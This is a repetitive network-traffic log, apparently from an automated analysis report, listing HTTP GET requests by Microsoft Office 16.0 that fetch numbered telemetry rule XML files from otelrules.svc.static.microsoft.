Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
